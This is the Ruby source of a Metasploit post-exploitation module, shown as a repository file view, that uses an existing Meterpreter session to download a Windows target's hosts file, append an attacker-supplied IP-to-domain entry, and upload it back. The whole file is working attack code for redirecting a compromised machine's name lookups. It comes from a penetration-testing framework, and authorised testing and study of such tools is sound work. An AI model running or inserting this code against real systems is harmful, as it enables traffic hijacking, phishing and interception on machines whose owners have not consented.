metasploit-framework/modules/post/windows/manage/inject_host.rb

65 lines
1.8 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Post
2013-08-30 21:28:54 +00:00
def initialize(info={})
super(update_info(info,
'Name' => 'Windows Manage Hosts File Injection',
'Description' => %q{
This module allows the attacker to insert a new entry into the target
system's hosts file.
},
'License' => BSD_LICENSE,
'Author' => [ 'vt <nick.freeman[at]security-assessment.com>'],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ]
))
2013-08-30 21:28:54 +00:00
register_options(
[
OptString.new('DOMAIN', [ true, 'Domain name for host file manipulation.' ]),
OptString.new('IP', [ true, 'IP address to point domain name to.' ])
], self.class)
end
2013-08-30 21:28:54 +00:00
def run
if datastore['IP'].nil? or datastore['DOMAIN'].nil?
print_error("Please specify both DOMAIN and IP")
return
end
2013-08-30 21:28:54 +00:00
ip = datastore['IP']
hostname = datastore['DOMAIN']
2013-08-30 21:28:54 +00:00
# Get a temporary file path
meterp_temp = Tempfile.new('meterp')
meterp_temp.binmode
temp_path = meterp_temp.path
2013-08-30 21:28:54 +00:00
begin
# Download the remote file to the temporary file
client.fs.file.download_file(temp_path, 'C:\\WINDOWS\\System32\\drivers\\etc\\hosts')
rescue RequestError => re
# If the file doesn't exist, then it's okay. Otherwise, throw the
# error.
if re.result != 2
raise $!
end
end
2013-08-30 21:28:54 +00:00
print_status("Inserting hosts file entry pointing #{hostname} to #{ip}..")
hostsfile = ::File.open(temp_path, 'ab')
hostsfile.write("\r\n#{ip}\t#{hostname}")
hostsfile.close()
2013-08-30 21:28:54 +00:00
client.fs.file.upload_file('C:\\WINDOWS\\System32\\drivers\\etc\\hosts', temp_path)
print_good("Done!")
end
end